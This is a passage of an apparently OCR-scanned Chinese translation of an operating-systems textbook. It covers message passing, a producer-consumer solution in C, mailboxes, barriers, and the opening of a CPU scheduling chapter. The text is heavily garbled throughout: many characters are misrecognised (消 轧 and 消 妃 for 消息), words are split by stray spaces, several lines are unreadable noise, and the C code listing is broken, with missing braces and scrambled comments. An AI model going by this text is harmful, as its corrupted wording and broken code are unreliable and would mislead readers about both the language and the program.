没有 消息 可 用 ， 则 接收 者 可 能 被 阻塞 ， 直 到 一 条 消息 到 达 ， 或 者 ， 春 着 


一 个 错误 码 立 即 返 回 。 





1. 消 息 传递 系统 的 设计 要 点 





消息 传递 系统 面临 着 许多 信号 量 和 省 程 所 未 涉及 的 问题 和 设计 难 
点 ， 特 别 是 位 于 网 络 中 不 同 机 器 上 的 通信 进程 的 情况 。 例 如 ， 消 轧 有 可 
能 和 被 网 络 丢 失 。 为 了 防止 消息 丢失 ， 发 送 方 和 接收 方 可 以 达成 如 下 一 








致 : 一 旦 接收 到 信息 ， 接 收 方 马 上 回 送 一 条 特殊 的 确认 
Cacknowledgement) 消息 。 如 果 发 送 方 在 一 段 时 间 间 隔 内 未 收 到 确 
认 ， 则 重 发 消息 。 


现在 考虑 消息 本 喘 航 正确 接收 ， 而 返回 给 发 送 者 的 确认 信息 丢失 的 
情况 。 发 送 者 将 重 发 信息 ， 这 样 接收 者 将 接收 到 两 次 相同 的 消 轧 。 对 于 
接收 者 来 说 ， 如 何 区 分 新 的 消息 和 一 条 重 发 的 老 消 息 是 非常 重要 的 。 通 
常 采 用 在 每 条 原始 消息 中 嵌入 一 个 连续 的 序号 来 解决 此 问题 。 如 果 接 收 
者 收 到 一 条 消息 ， 它 具有 与 前 面 茶 一 条 消 轧 一 样 的 序号 ， 台 知 道 这 条 消 

恩 是 重复 的 ， 可 以 忽略 。 不 可 菲 消 息 传 递 中 的 成 功 通信 问题 是 计算 机 网 
络 的 主要 研究 内 容 。 更 多 的 信息 可 以 参考 相关 文献 Tanenbaum,， 
1996) 。 




















消息 系统 还 需要 解决 进程 命名 的 问题 ， 在 send 和 receive 调 用 中 所 指 
定 的 进程 必须 是 没有 二 义 性 的 。 喘 份 认 证 Cauthentication) 也 是 一 个 问 
题 。 比 如 ， 客 户 机 怎么 知道 它 是 在 与 一 个 真正 的 文件 服务 器 通信 ， 而 不 
古 与 一 个 冒充 者 通信 ? 








对 于 发 送 者 和 接收 者 在 同一 台 机 器 上 的 情况 ， 也 存在 若干 设计 问 
题 。 其 中 一 个 设计 问题 就 是 性 能 问题 。 将 消息 从 一 个 进程 复制 到 另 一 个 
进程 通常 比 信号 量 操作 和 进入 管 程 要 慢 。 为 了 使 消息 传递 变 得 高 效 ， 人 
们 已 经 做 了 许多 工作 。 例 如 ，Cheriton (1984) 建议 限制 信息 的 大 小 ， 
使 其 能 装 入 机 器 的 寄存 器 中 ， 然 后 便 可 以 使 用 寄存 器 进行 消息 传递 。 





2. 用 消息 传递 解决 生产 者 -消费 者 问题 





现在 我 们 来 考察 如 何 用 消息 传递 而 不 是 共 胖 内 存 来 解决 生产 者 - 消 
费 者 问题 。 在 图 2-36 中 ， 我 们 给 出 了 一 种 解法 。 假 设 所 有 的 消息 都 有 同 
样 的 大 小 ， 并 且 在 尚未 接收 到 发 出 的 消息 时 ， 由 操作 系统 目 动 进行 绥 
冲 。 在 该 解决 方案 中 共 使 用 N 条 消息 ， 这 就 类 似 于 一 块 共享 内 存 缓冲 区 
中 的 N 个 槽 。 消 费 者 首先 将 N 条 空 消 妃 发 送 给 生产 者 。 当 生产 者 问 消 费 
者 传递 一 个 数据 项 时 ， 它 取 走 一 条 空 消 息 并 送 回 一 条 填充 了 和 内容 的 消 
恩 。 通 过 这 种 方式 ， 系 统 中 总 的 消 恕 数 保持 不 变 ， 所 以 消息 都 可 以 存放 
在 事先 确定 数量 的 内 存 中 。 














#define N 100 
void producer(void) 


int item; 
message m; 


while (TRUE) { 


item = produce_item(); 
receive(consumer, &m); 
build_message(&m, item); 
send(consumer, &m); 


} 


void consumer(void) 


{ 


int item, i; 
message m; 


for (i = 0; i < N; i++) send(producer, &m); 


while (TRUE) { 


receive(producer, &m); 
item = extract_item(&m); 
send(producer, &m); 
consume_item(item); 


图 2-36 用 NN 条 


如 果 生 产 者 的 速度 比 消费 者 快 ， 则 所 有 的 消息 最 


/* 缓冲 区 中 的 横 数 目 */ 


/* 消息 缓冲 区 */ 


* 产生 放 入 缓冲 区 的 一 些 数据 */ 
等 待 消费 者 发 送 空 缓冲 区 */ 
/* 建立 一 个 待 发 送 的 消息 */ 

/* 发 送 数据 项 给 消费 者 */ 


上 # 发 送 N 个 空 缓冲 区 */ 


/* 接收 包含 数据 项 的 消息 */ 

上 将 数据 项 从 消息 中 提取 出 来 */ 
主将 空 缓冲 区 发 送 回 生产 者 / 
/* 处 理 数 据 项 */ 





消息 实现 的 生产 者 -消费 者 问题 


符 消 费 者 ， 生 产 者 将 被 阻 蹇 ， 等 竺 返回 
快 ， 则 情况 正好 相反 : 所 有 的 消息 均 为 空 


费 者 被 阻塞 ， 以 等 待 一 


RE 


真 充 过 的 消息 。 





消 妃 传递 方式 可 以 有 许多 变 体 。 我 们 首先 介绍 如 何 对 消息 进行 编 
目 。 一 种 方法 是 为 每 个 进程 分 配 一 个 惟一 的 地 址 ， 


终 都 将 被 填 满 ， 
一 未 = A /Co 如 果 消 费 者 速度 


Aran 
= 于 


xz， 等 待 生产 者 来 填充 它们 ， 消 





让 消 妃 按 进 程 的 地 址 


编 址 。 忆 一 种 方法 是 引入 一 种 新 的 数据 结构 ， 称 作 信箱 (mailbox) 。 

信箱 是 一 个 用 来 对 一 定数 量 的 消息 进行 缓冲 的 地 方 ， 信 箱 中 消息 数量 的 
设置 方法 也 有 多 种 ， 典 型 的 方法 是 在 信箱 创建 时 确定 消 妃 的 数量 。 当 使 
用 信箱 时 ， 在 send 和 receive 调 用 中 的 地 址 参数 就 是 信箱 的 地 址 ， 而 不 是 
进程 的 地 址 。 当 一 个 进程 试图 同一 个 满 的 信箱 发 消 轧 时 ， 它 将 和 家 挂 起 ， 
直到 信箱 内 有 消 轧 被 取 走 ， 从 而 为 新 消 妃 腾 出 空间 。 











对 于 生产 者 -消费 者 问题 ， 生 产 者 和 消费 者 均 应 创建 足够 容纳 N 条 消 
奶 的 信箱 。 生 产 者 回 消 费 者 信箱 发 送 包 含 实际 数据 的 消息 ， 消 费 者 则 加 
生产 者 信箱 发 送 空 的 消 妃 。 当 使 用 信箱 时 ， 绥 冲 机 制 的 作用 是 很 清楚 
的 : 目标 信箱 容纳 那些 已 被 发 送 但 尚未 被 目标 进程 接收 的 消 妃 。 




















使 用 信箱 的 另 一 种 极端 方法 是 彻底 取消 缓冲 。 采 用 这 种 方法 时 ， 如 
果 send 在 receive 之 前 执行 ， 则 发 送 进程 被 阻塞 ， 直 到 receive 发 生 。 在 执 
行 receive 时 ， 消 息 可 以 直接 从 发 送 者 复制 到 接收 者 ， 不 用 任何 中 间 绥 
冲 。 类 似 地 ， 如 果 先 执行 receive， 则 接收 者 会 被 阻塞 ， 直 到 send 发 生 。 
这 种 方案 常 被 称 为 会 合 (rendezvous) 。 与 带 有 绥 冲 的 消息 方案 相 比 ， 
该 方案 实现 起 来 更 容易 一 些 ， 但 却 降低 了 灵活 性 ， 因 为 发 送 者 和 接收 者 
一 定 要 以 步 步 紧 接 的 方式 运行 。 


通 弟 在 并 行程 序 设计 系统 中 使 用 消息 传递 。 例 如 ， 一 个 著名 的 消息 
传递 系统 是 消息 传递 接口 (Message-Passing Interface, MPI) ， 它 广泛 
应 用 在 科学 计算 中 。 有 关 该 系统 的 更 多 信息 ， 可 参考 相关 文献 (Gropp 


等 人 ，1994; Snir 等 人 ，1996) 。 


2.3.9 ”屏障 





最 后 一 个 同步 机 制 是 准备 用 于 进程 组 而 不 是 用 于 双 进 程 的 生产 者 - 
消费 者 类 情形 的 。 在 有 些 应 用 中 划分 了 知 干 阶段 ， 并 且 规 定 ， 除 非 所 有 
的 进程 都 就 绪 准 备 着 手下 一 个 阶段 ， 否 则 任何 进程 都 不 能 进入 下 一 个 阶 
段 。 可 以 通过 在 每 个 阶段 的 结尾 安置 屏障 Carrier) 来 实现 这 种 行为 。 
当 一 个 进程 到 达 屏 障 时 ， 它 就 被 屏障 阻拦 ， 直 到 所 有 进程 都 到 达 该 屏障 
为 止 。 屏 障 的 操作 如 图 2-37 所 示 。 





OOOO 





时 间 一 时 间 一 一 时 间 一 一 

a) b) c) 
图 2-37 屏障 的 使 用 : 引进 程 接近 屏障 ; b) 除 了 一 个 之 外 所 有 的 进程 
都 被 屏障 阻塞 ; co) 当 最 后 一 个 进程 到 达 屏 障 时 ， 所 有 的 进程 一 起 通过 


在 图 2-37a 中 可 以 看 到 有 四 个 进程 接近 屏 这 意味 着 它们 正在 运 
算 ， 但 是 还 没有 到 达 每 个 阶段 的 结尾 。 过 了 一 会 儿 ， 第 一 个 进程 完成 了 
所 有 需要 在 第 一 阶段 进行 的 计算 。 它 接着 执行 barrier 原 语 ， 这 通常 是 调 





用 一 个 库 过 程 。 于 是 该 进程 被 挂 起 。 一 会 儿 ， 第 二 个 和 第 三 个 进程 也 完 
成 了 第 一 阶段 的 计算 ， 也 接着 执行 barrier 原 语 。 这 种 情形 如 图 2-37b 所 
示 。 结 果 ， 当 最 后 一 个 进程 C 到 达 屏 障 时 ， 所 有 的 进程 就 一 起 被 释放 ， 
如 图 2-37c 所 示 。 





作为 一 个 需要 屏障 的 例子 ， 考 虑 在 物理 或 工程 中 的 一 个 典型 弛 豫 问 
题 。 这 是 一 个 带 有 初 值 的 和 矩阵。 这些 值 可 能 代表 一 块 金属 板 上 各 个 点 的 
温度 值 。 基 本 想法 可 以 是 准备 计算 如 下 的 问题 ， 要 花费 多 长 时 间 ， 在 一 
个 角 上 的 火焰 才能 传播 到 整个 板 上 。 


计算 从 当前 值 开始 ， 移 对 和 窍 阵 进行 一 个 变换 ， 从 而 得 到 第 二 个 算 
阵 ， 例 如 ， 运 用 热力 学 定律 考察 在 AT 之 后 的 整个 温度 分 布 。 然 后 ， 进 
程 不 断 重 复 ， 随 着 金属 板 的 加 热 ， 给 出 样本 点 温度 随时 间 变 化 的 函数 。 
该 算法 从 而 随时 间 变 化 生成 出 一 系列 矩阵 。 


现在 ， 我 们 设想 这 个 和 窍 阵 非常 之 大 《比如 100 万 行 乘 以 100 万 列 ) ， 

所 以 需要 并 行 处 理 〈 可 能 在 一 台 多 处 理 器 上 ) 以 便 加 速 运算 。 各 个 进程 
工作 在 这 个 第 阵 的 不 同 部 分 ， 并 且 从 老 的 矩阵 按照 物理 定律 计算 新 的 箱 
阵 元 素 。 但 是 ， 除 非 第 n 次 迭代 已 经 完成 ， 也 就 是 说 ， 除 非 所 有 的 进程 
都 完成 了 当前 的 工作 ， 否 则 没有 进程 可 以 开始 第 n+1 次 迭代 。 实 现 这 一 
目标 的 方法 是 通过 编程 使 每 一 个 进程 在 完成 当前 迭代 部 分 后 执行 一 个 
barrier 操 作 。 只 有 当 全 部 进程 完成 工作 之 后 ， 新 的 矩阵 (下 一 次 迭代 的 
输入 ) 才 会 完成 ， 此 时 所 有 的 进程 会 被 释放 而 开始 新 的 迭代 过 程 。 


2.4 调度 


当 计 算 机 系统 是 多 道 程序 设计 系统 时 ， 通 常 就 会 有 多 个 进程 或 线程 
同时 竞争 CPU。 只 要 有 两 个 或 更 多 的 进程 处 于 就 绪 状 态 ， 这 种 情形 就 会 
发 生 。 如 果 只 有 一 个 CPU 可 用 ， 那 么 就 必须 选择 下 一 个 要 运行 的 进程 。 
在 操作 系统 中 ， 完 成 选择 工作 的 这 一 部 分 称 为 调度 程序 (scheduler) , 
该 程序 使 用 的 算法 称 为 调度 算法 (scheduling algorithm) 。 





尽管 有 一 些 不 同 ， 但 许多 适用 于 进程 调度 的 处 理 方法 也 同样 适用 于 
线程 调度 。 当 内 核 管 理 线程 的 时 候 ， 调 度 经 常 是 按 线程 级 别 的 ， 与 线程 
所 属 的 进程 基本 或 根本 没有 关联 。 下 面 我 们 将 首先 关注 适用 于 进程 与 线 
程 两 者 的 调度 问题 ， 然 后 会 明确 地 介绍 线程 调度 以 及 它 所 产生 的 独特 问 


题 。 第 8 草 将 讨论 多 核心 片 的 问题 。 








2.4.1 调度 介绍 


证 我 们 回 到 早期 以 磁带 上 的 卡片 作为 输入 的 批 处 理 系 统 时 代 ， 那 时 
的 调度 算法 很 简单 : 依次 运行 磁带 上 的 每 一 个 作业 。 对 于 多 道 程 序 设 计 
系统 ， 调 度 算法 要 复杂 一 些 ， 因 为 经 常 有 多 个 用 户 等 候 服务 。 有 些 大 型 
机 系统 仍旧 将 批 处 理 和 分 时 服务 结合 使 用 ， 需 要 调度 程序 决定 下 一 个 运 
行 的 是 一 个 批 处 理 作业 还 是 终端 上 的 一 个 交互 用 户 。《〈 顺 便 提 及 ， 一 个 


批 处 理 作业 可 能 需要 连续 运行 多 个 程序 ， 不 过 在 本 市 中 ， 我 们 假设 它 只 
是 一 个 运行 单个 程序 的 请 求 。〉 由 于 在 这 些 机 右 中 ，CPU 是 稀缺 资源 ， 
所 以 好 的 调度 程序 可 以 在 提高 性 能 和 用 户 的 满意 度 方面 取得 很 大 的 成 
果 。 因 此 ， 大 量 的 研究 工作 都 花费 在 创造 聪明 而 有 效 的 调度 算法 上 了 。 








在 拥有 了 个 人 计算 机 的 优势 之 后 ， 整 个 情形 上 向 两 个 方面 发 展 。 首 
先 ， 在 多 数 时 间 内 只 有 一 个 活动 进程 。 一 个 用 户 进 入 文字 处 理 软 件 编 辑 
一 个 文件 时 ， 一 般 不 会 同时 在 后 台 编 译 一 个 程序 。 在 用 户 疝 文字 处 理 软 
件 键入 一 条 命令 时 ， 调 度 程序 不 用 做 多 少 工 作 来 判定 哪个 进程 要 运行 
一 一 惟一 的 候选 者 是 文字 处 理 软件 。 








其 次 ， 同 CPU 是 稀缺 资源 时 的 年 代 相 比 ， 现 在 计算 机 速度 极 快 。 个 
人 计算 机 的 多 数 程序 受到 的 是 用 户 当前 输入 速率 《键入 或 散 击 鼠标 ) 的 
限制 ， 而 不 是 CPU 处 理 速率 的 限制 。 即 便 对 于 编译 (这 是 过 去 CPU 周 期 
的 主要 消耗 者 现在 大 多 数 情 况 下 也 只 要 花费 仅仅 几 秒 钟 。 甚 至 两 个 实 
际 同 时 运行 的 程序 ， 诸 如 一 个 文字 处 理 软件 和 一 个 电子 表单 ， 由 于 用 户 
在 等 待 两 者 完成 工作 ， 因 此 很 难说 需要 哪 一 个 先 完成 。 这 样 的 结果 是 ， 
调度 程序 在 简单 的 PC 机 上 并 不 重要 。 当 然 ， 总 有 应 用 程序 会 实际 消耗 
掉 CPU， 例 如 ， 为 绘制 一 小 时 高 精度 视频 而 调整 108 000 帧 《NTSC 制 ) 
或 90 000 帧 〈PAL 制 ) 中 的 每 一 帧 颜色 就 需要 大 量 工业 强度 的 计算 能 
力 。 然 而 ， 类 似 的 应 用 程序 不 在 我 们 的 考虑 范围 。 











当 我 们 转 癌 网 络 服务 器 时 ， 情 况 略 微 有 些 改变 。 这 里 ， 多 个 进程 经 





种 竞争 CPU， 因 此 调度 功能 再 一 次 变 得 公关 重要 。 例 如 ， 当 CPU 必须 在 
运行 一 个 收集 每 日 统计 数据 的 进程 和 服务 用 户 需 求 的 进程 之 间 进 行 选择 
的 时 候 ， 如 果 后 者 首先 占用 了 CPU， 用 户 将 会 更 遍 兴 。 








另外 ， 为 了 选取 正确 的 进程 运行 ， 调 度 程 序 还 要 考虑 CPU 的 利用 

率 ， 因 为 进程 切换 的 代价 是 比较 高 的 。 首 先 用 户 态 必 须 切换 到 内 核 态 ; 
然后 要 保存 当前 进程 的 状态 ， 包 括 在 进程 表 中 存储 寄存 器 值 以 便 以 后 重 
新 装载 。 在 许多 系统 中 ， 内 存 映像 〈 例 如 ， 页 表 内 的 内 存 访问 位 ) 也 必 
须 保存 ; 接着， 通过 运行 调度 算法 选 定 一 个 新 进程 ;， 之后， 应 该 将 新 进 
程 的 内 存 映 像 重 新 装 入 MMU; 最 后 新 进程 开始 运行 。 除 此 之 外 ， 进 程 
切换 还 要 使 整个 内 存 高 速 缓存 失效 ， 强 迫 缓存 从 内 存 中 动态 重新 装 入 两 
次 (进入 内 核 一 次 ， 离 开 内 核 一 次 ) 。 总 之 ， 如 果 每 秒 钟 切换 进程 的 次 
数 太 多 ， 会 耗费 大 量 CPU 时 间 ， 所 以 有 必要 提醒 注意 。 


1. 进 程 行为 


几乎 所 有 进程 的 《磁盘 ) IO 请 求 或 计算 都 是 交 丛 突 发 的， 如 图 2-38 
所 示 。 和 典型 地 ，CPU 不 停顿 地 运行 一 段 时 间 ， 然 后 发 出 一 个 系统 调用 以 
便 读 写 文 件 。 在 完成 系统 调用 之 后 ，CPU 又 开始 计算 ， 直 到 它 需 要 读 更 
多 的 数据 或 写 更 多 的 数据 为 止 。 请 注意 ， 茶 些 IO 活 动 可 以 看 作 是 计 
算 。 例 如 ， 当 CPU 加 视频 RAM 复 制 数 据 以 更 新 屏幕 时 ， 因 为 使 用 了 
CPU， 上 所 以 这 是 计算 ， 而 不 是 IO 活动 。 按 照 这 种 观点 ， 当 一 个 进程 等 
竺 外 部 设备 完成 工作 而 被 阻塞 时 ， 才 是 IO 活动 。 








长 CPU 突 发 


短 CPU 突 发 a \ 
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图 2-38 CPU 的 突 发 使 用 和 等 待 I[/O 的 时 期 交替 出 现 : a)\CPUS RAH 
程 ;b)I/O 〇 密集 型 进程 


图 2-38 中 有 一 件 值得 注意 的 事 ， 即 某 些 进程 《图 2-38a 的 进程 ) 花费 
了 绝 大 多 数 时 间 在 计算 上 ， 而 其 他 进程 《图 2-38b 的 进程 ) 则 在 等 待 IO 
上 花费 了 绝 大 多 数 时 间 。 前 者 称 为 计算 密集 型 (compute-bound) ， 后 
者 称 为 W/O 密集 型 (WO-bound) 。 典 型 的 计算 密集 型 进程 具有 较 长 时 间 
的 CPU 和 集中 使 用 和 较 小 频 度 的 VO 等 等。L/O 密 集 型 进程 具有 较 短 时 间 的 
CPU 集 中 使 用 和 频繁 的 VO 等 待 。 它 是 VO 类 的 ， 因 为 这 种 进程 在 WO 请 求 
之 间 较 少 进 行 计算 ， 并 不 是 因为 它们 有 特别 长 的 VO 请 求 。 在 WO 开始 后 
无 论处 理 数据 是 多 还 是 少 ， 它 们 都 花费 同样 的 时 间 提 出 硬件 请 求 读 取 破 
HER . 








有 必要 指出 ， 随 着 CPU 变 得 越 来 越 快 ， 更 多 的 进程 倾 癌 为 IO 密集 
型 。 这 种 现象 之 所 以 发 生 是 因为 CPU 的 改进 比 磁盘 的 改进 快 得 多 ， 其 结 
打 是 ， 未 来 对 IO 密集 型 进程 的 调度 处 理 似乎 更 为 重要 。 这 里 的 基本 思 











想 是 ， 如 采 需 要 运行 JO 密 集 型 进程 ， 那 么 就 应 该 让 它 尽 快 得 到 机 会 ， 
以 便 发 出 磁盘 请 求 并 保持 磁盘 始终 忙碌 。 从 图 2-6 中 可 以 看 到 ， 如 果 进 
程 是 1/O 密 集 型 的 ， 则 需要 多 运行 一 些 这 类 进程 以 保持 CPU 的 充分 利 

Hs 





2. 何 时 调度 


有 关 调 度 处 理 的 一 个 关键 问题 是 何 时 进行 调度 决策 。 存 在 着 需要 调 
度 处 理 的 各 种 情形 。 第 一 ， 在 创建 一 个 新 进程 之 后 ， 需 要 决定 是 运行 父 
进程 还 是 运行 子 进程 。 由 于 这 两 种 进程 都 处 于 就 绪 状 态 ， 所 以 这 是 一 种 
正 弟 的 调度 决策 ， 可 以 任意 决定 ， 也 就 是 说 ， 调 度 程 序 可 以 合法 选择 先 











第 二 ， 在 一 个 进程 退出 时 必须 做 出 调度 决策 。 一 个 进程 不 再 运行 
《因为 它 不 再 存在 ) ， 所 以 必须 从 就 绪 进 程 集中 选择 另外 某 个 进程 。 如 
果 没 有 束 绪 的 进程 ， 通 常会 运行 一 个 系统 提供 的 空间 进程 。 


第 三 ， 当 一 个 进程 阻塞 在 17O 和 信和 号 量 上 或 由 于 其 他 原因 阻 压 时 ， 
必须 选择 另 一 个 进程 运行 。 有 时 ， 阻 赛 的 原因 会 成 为 选择 的 因素 。 例 
如 ， 如 果 A 是 一 个 重要 的 进程 ， 并 正在 等 竺 B 退 出 临界 区 ， 让 B 随 后 运行 
将 会 使 得 B 退 出 临界 区 ， 从 而 可 以 让 A 运 行 。 不 过 问题 是 ， 通 第 调度 程 
序 并 不 拥有 做 出 这 种 相关 考虑 的 必要 信息 。 





第 四 ， 在 一 个 IO 中 断 发 生 时 ， 必 须 做 出 调度 决策 。 如 果 中 断 来 自 


IO 设备 ， 而 该 设备 现在 完成 了 工作 ， 某 些 被 阻塞 的 等 待 该 O 的 进程 束 
成 为 可 运行 的 就 绪 进 程 了 。 是 否 让 新 就 绪 的 进程 运行 ， 这 取决 于 调度 程 
序 的 决定 ， 或 者 让 中 断 发 生 时 运行 的 进程 继续 运行 ， 或 者 应 该 让 某 个 其 


他 进程 运行 。 


如 果 人 硬件 时 钟 提供 50Hz、60Hz 或 其 他 频率 的 周期 性 中 断 ， 可 以 在 
每 个 时 钟 中 断 或 者 在 每 k 个 时 钟 中 断 时 做 出 调度 决策 。 根 据 如 何 处 理 时 
钟 中 断 ， 可 以 把 调度 算法 分 为 两 类 。 非 抢占 式 调度 算法 挑选 一 个 进程 ， 
然后 让 该 进程 运行 直至 锐 阻 罕 〈 阻 突 在 WO 上 或 等 待 男 一 个 进程 》， 或 
者 直到 该 进程 目 动 释放 CPU。 即 使 该 进程 运行 了 奎 干 个 小 时 ， 它 也 不 会 
被 强迫 挂 起 。 这 样 做 的 结果 是 ， 在 时 钟 中 断 发 生 时 不 会 进行 调度 。 在 处 
理 完 时 钟 中 断后 ， 如 果 没 有 更 高 优先 级 的 进程 等 竺 到 时 ， 则 被 中 断 的 进 


程 会 继续 执行 。 














相反 ， 抢 占 式 调度 算法 挑选 一 个 进程 ， 并 且 让 该 进程 运行 茶 个 固定 
时 段 的 最 大 值 。 如 果 在 该 时 段 结 束 时 ， 该 进程 仍 在 运行 ， 它 就 被 挂 起 ， 
而 调度 程序 挑选 妨 一 个 进程 运行 《如 果 存 在 一 个 就 绪 进 程 ) 。 进 行 抢占 
式 调度 处 理 ， 需 要 在 时 间 间 隔 的 末端 发 生 时 钟 中 断 ， 以 便 把 CPU 控制 返 
回 给 调度 程序 。 如 条 没有 可 用 的 时 钟 ， 那 么 非 抢占 式 调度 就 是 惟一 的 选 
择 了 。 


3. 调 度 算 法 分 类 





坚 无 疑问 ， 不 同 的 环境 需要 不 同 的 调度 算法 。 之 所 以 出 现 这 种 情 
形 ， 是 因为 不 同 的 应 用 领域 (以 及 不 同 的 操作 系统 ) 有 不 同 的 目标 。 换 
句 话说 ， 在 不 同 的 系统 中 ， 调 度 程 序 的 优化 是 不 同 的 。 这 里 有 必要 划分 
出 三 种 环境 : 


1) 批 处 理 。 
2)20 AK. 


3) 实 时 。 





批 处 理 系统 在 商业 领域 仍 在 广泛 应 用 ， 用 来 处 理 薪 水 册 、 存 货 清 
H. KEHKA KESHE. PETE ERIT ~ RIKOE ERRA 
司 ) 和 其 他 的 周期 性 的 作业 。 在 批 处 理 系 统 中 ， 不 会 有 用 户 不 耐烦 地 在 
终端 旁 等 待 一 个 短 请 求 的 快捷 响应 。 因 此 ， 非 抢占 式 算 法 ， 或 对 每 个 进 
程 都 有 长 时 间 周 期 的 抢占 式 算 法 ， 通 名 都 是 可 接受 的 。 这 种 处 理 方式 减 
少 了 进程 的 切换 从 而 改善 了 性 能 。 这 些 批 处 理 算 法 实际 上 相当 普及 ， 并 
经 常 可 以 应 用 在 其 他 场合 ， 这 使 得 人 们 值得 去 学 习 它 们 ， 甚 至 是 对 于 那 
些 没有 接触 过 大 型 机 计算 的 人 们 。 


在 交互 式 用户 环 境 中 ， 为 了 避免 一 个 进程 霸占 CPU 拒绝 为 其 他 进程 
服务 ， 抢 占 是 必需 的 。 即 便 没 有 进程 想 永 远 运行 ， 但 是 ， 东 个 进程 由 于 
一 个 程序 错误 也 可 能 无 限期 地 排斥 所 有 其 他 进程 。 为 了 避免 这 种 现象 友 
生 ， 抢 占 也 是 必要 的 。 服 务 器 也 归于 此 类 ， 因 为 通常 它们 要 服务 多 个 突 





发 的 (远程 ) 用 户 。 


然而 在 有 实时 限制 的 系统 中 ， 抢 占有 时 是 不 需要 的 ， 因 为 进程 了 解 
它们 可 能 会 长 时 间 得 不 到 运行 ， 所 以 通常 很 快 地 完成 各 自 的 工作 并 阻 
窒 。 实 时 系统 与 交互 式 系统 的 差别 是 ， 实 时 系统 只 运行 那些 用 来 推进 现 
有 应 用 的 程序 ， 而 交互 式 系统 是 通用 的 ， 它 可 以 运行 任意 的 非 协 作 甚 至 
是 有 恶意 的 程序 。 




















4. 调 度 算 法 的 目标 


为 了 设计 调度 算法 ， 有 必要 考虑 什么 是 一 个 好 的 调度 算法 。 茶 些 目 
标 取决 于 环境 ( 批 处 理 、 交 互 式 或 实时 ) ， 但 是 还 有 一 些 目标 是 适用 于 
所 有 情形 的 。 在 图 2-39 中 列 出 了 一 些 目标 ， 我 们 将 在 下 和 面 逐 一 讨论 。 


所 有 系统 

公平 一 一 给 每 个 进程 公平 的 CPU 份额 
策略 强制 执行 一 一 看 到 所 宣布 的 策略 执行 
平衡 一 一 保持 系统 的 所 有 部 分 都 忙碌 
批 处 理 系 统 

否 吐 量 一 一 每 小 时 最 大 作业 数 

周转 时 间 一 一 从 提交 到 终止 间 的 最 小 时 间 


CPU 利用 率 一 一 保持 CPU 始终 忙碌 
交互 式 系统 

响应 时 间 一 一 快速 响应 请 求 

均衡 性 一 一 满足 用 户 的 期 望 
实时 系统 

满足 截止 时 间 一 一 避免 丢失 数据 

可 预测 性 一 一 在 多 媒体 系统 中 避免 品质 降低 





图 2-39 在 不 同 环境 中 调度 算法 的 一 些 目标 


在 所 有 的 情形 中 ， 公 平 是 很 重要 的 。 相 似 的 进程 应 该 得 到 相似 的 服 
务 。 对 一 个 进程 给 予 较 其 他 等 价 的 进程 更 多 的 CPU 时 间 是 不 公平 的 。 当 
然 ， 不 同类 型 的 进程 可 以 采用 不 同方 式 处 理 。 可 以 考虑 一 下 在 核反应 挫 
计算 机 中 心安 全 控制 与 发 放 攻 水 处 理 之 间 的 差别 。 








与 公平 有 关 的 是 系统 策略 的 强制 执行 。 如 果 局 部 策略 是 ， 只 要 需要 
就 必须 运行 安全 控制 进程 《即便 这 意味 着 推迟 30 秒 钟 及 新 ) ， 那 么 调度 
程序 就 必须 保证 能 够 强制 执行 该 策略 。 





另 一 个 共同 的 目标 是 保持 系统 的 所 有 部 分 尽 可 能 忙碌 。 如 打 CPU 和 
所 有 IO 设备 能 够 始终 运行 ， 那 么 相对 于 让 茶 些 部 件 空转 而 言 ， 每 秒 钟 
就 可 以 完成 更 多 的 工作 。 例 如 ， 在 批 处 理 系统 中 ， 调 度 程 序 控制 哪个 作 
业 调 入 内 存 运 行 。 在 内 存 中 既 有 一 些 CPU 密集 型 进程 勾 有 一 些 MO 密 集 
型 进程 是 一 个 较 好 的 想法 ， 好 于 先 调 入 和 运行 所 有 的 CPU 密集 型 作业 ， 
然后 在 它们 完成 之 后 再 调 入 和 运行 所 有 IO 密集 型 作业 的 做 法 。 如 果 使 
用 后 面 一 种 筑 略 ， 在 CPU 密集 型 进程 运行 时 ， 它 们 就 要 竞争 CPU， 而 磁 
盘 却 在 空转 。 稍 后 ， 当 IO 密集 型 作业 来 了 之 后 ， 捷 们 要 为 磁盘 而 竞 
争 ， 而 CPU 又 空转 了 。 显 然 ， 通 过 对 进程 的 仔细 组 合 ， 可 以 保持 整个 系 


统 运行 得 更 好 一 些 。 














运行 大 量 批 处 理 作 业 的 大 型 计算 中 心 的 管理 者 们 为 了 和 擎 握 其 系统 的 
工作 状态 ， 通 常 检查 三 个 指标 : 吞吐 量 、 周 转 时 间 以 及 CPU 利用 率 。 和 在 
叶 量 (throughout) 是 系统 每 小 时 完成 的 作业 数量 。 把 所 有 的 因素 考虑 
进去 之 后 ， 每 小 时 完成 50 个 作业 好 于 每 小 时 完成 40 个 作业 。 周 转 时 间 
(turnaround time) 是 指 从 一 个 批 处 理 作业 提交 时 刻 开始 直到 该 作业 完 
成 时 刻 为 止 的 统计 平均 时 间 。 访 数据 度量 了 用 户 要 得 到 输出 所 需 的 平均 


等 待 时 间 。 其 规则 是 :小 就 是 好 的 。 





能 够 使 吞吐 量 最 大 化 的 调度 算法 不 一 定 就 有 最 小 的 周转 时 间 。 例 
如 ， 对 于 确定 的 短 作 业 和 长 作业 的 一 个 组 合 ， 总 是 运行 短 作 业 而 不 运行 
长 作业 的 调度 程序 ， 可 能 会 获得 出 色 的 吞吐 性 能 〈 每 小 时 大 量 的 短 作 





业 ) ， 但 是 其 代价 是 对 于 长 的 作业 周转 时 间 很 寺 。 如 果 短 作业 以 一 个 稳 
定 的 速率 不 断 到 达 ， 长 作业 可 能 根本 运行 不 了 ， 这 样 平均 周转 时 间 是 无 
限 长 ， 但 是 得 到 了 高 的 吞吐 量 。 








CPU 利用 率 常 常用 于 对 批 处 理 系统 的 度量 。 尽 管 这 样 ，CPU 利 用 率 
并 不 是 一 个 好 的 度量 参数 。 真 正 有 价值 的 是 ， 系 统 每 小 时 可 完成 多 少 作 
业 《 香 吐 量 ) ， 以 及 完成 作业 需要 多 长 时 间 (周转 时 间 〉 。 把 CPU 利用 
率 作 为 度量 依据 ， 就 像 用 引擎 每 小 时 转动 了 多 少 次 来 比较 汽车 的 好 坏 一 
样 。 另 一 方面 ， 知 道 什么 时 候 CPU 利 用 率 接近 100% 比 知道 什么 时 候 要 
求 得 到 更 多 的 计算 能 力 要 有 用 。 














对 于 交互 式 系 统 ， 则 有 不 同 的 指标 。 最 重要 的 是 最 小 啊 应 时 间 ， 即 
从 发 出 命令 到 得 到 响应 之 间 的 时 间 。 在 有 后 台 进 程 运行 〈 例 如， 从 网 络 
